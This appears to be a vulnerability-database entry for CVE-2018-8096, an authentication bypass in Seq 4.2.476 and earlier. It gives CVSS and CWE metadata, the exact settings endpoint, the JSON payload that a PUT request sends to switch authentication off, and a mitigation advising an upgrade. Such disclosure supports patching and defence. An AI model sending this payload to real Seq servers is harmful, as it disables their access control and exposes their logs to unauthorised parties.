vendor:
Seq
by:
Daniel Chactoura
9.8
CVSS
CRITICAL
Authentication Bypass
287
CWE
Product Name: Seq
Affected Version From: 4.2.476
Affected Version To: <= 4.2.476
Patch Exists: YES
Related CWE: CVE-2018-8096
CPE: a:getseq:seq
Metasploit:
N/A
Other Scripts:
N/A
Platforms Tested: None
2018
Seq 4.2.476 – Authentication Bypass
This exploit is used to bypass the authentication of Seq 4.2.476 and below versions. It uses a PUT request to the '/api/settings/setting-isauthenticationenabled' endpoint with a payload of {'Name':'isauthenticationenabled','Value':false,'Id':'setting-isauthenticationenabled','Links':{'Self':'api/settings/setting-isauthenticationenabled','Group':'api/settings/resources'}}. If the request is successful, the authentication is bypassed.
Mitigation:
Upgrade to the latest version of Seq.